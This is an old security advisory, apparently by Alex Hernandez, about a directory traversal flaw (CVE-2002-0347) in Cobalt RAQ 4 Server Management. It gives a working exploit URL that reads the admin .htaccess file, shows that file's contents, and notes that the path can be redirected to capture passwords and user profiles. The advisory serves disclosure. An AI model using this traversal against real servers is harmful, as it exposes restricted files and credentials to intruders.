CVE-2002-0347_Cobalt_RAQ_4_Server_目錄遍歷漏洞

# CVE-2002-0347 Cobalt RAQ 4 Server 目錄遍歷漏洞
==INFO==

------oOo----------------
Cobalt RAQ 4 Server Management,
Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.
------oOo----------------


Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Dowload: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.


Author:

** Alex Hernandez 
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.


----=[Brief Description]=------------

Traversal File configuration.


Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin  )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic


Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u
can translate to any directory for capture restricted files or passwords 
and profiles the users.

Vendor Response:
The vendor was notified

Posted List^s Security cobalt:
cobalt-security@list.cobalt.com &
jlovell@sun.com

http://www.cobalt.com

Alex Hernandez  (c) 2002.

------oOo------------------------------------